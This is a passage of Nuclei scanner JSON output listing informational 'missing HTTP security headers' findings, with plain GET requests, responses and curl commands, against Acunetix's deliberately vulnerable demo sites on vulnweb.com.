sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eSecond sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:14.643290804Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"path\":\"/CVS/Entries.Log\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"request\":\"GET /CVS/Entries.Log HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:14.643300798Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:14.939114865Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:14.9391662Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"request\":\"GET /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nContent-Length: 1245\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e404 - File or directory not found.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e404 - File or directory not found.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:15.088750237Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"path\":\"/.idea/.name\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/.name\",\"request\":\"GET /.idea/.name HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4f911cd6-6\\\"\\r\\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacuart\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:15.088809993Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"path\":\"/CVS/Entries\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries\",\"request\":\"GET /CVS/Entries HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:15.088819693Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 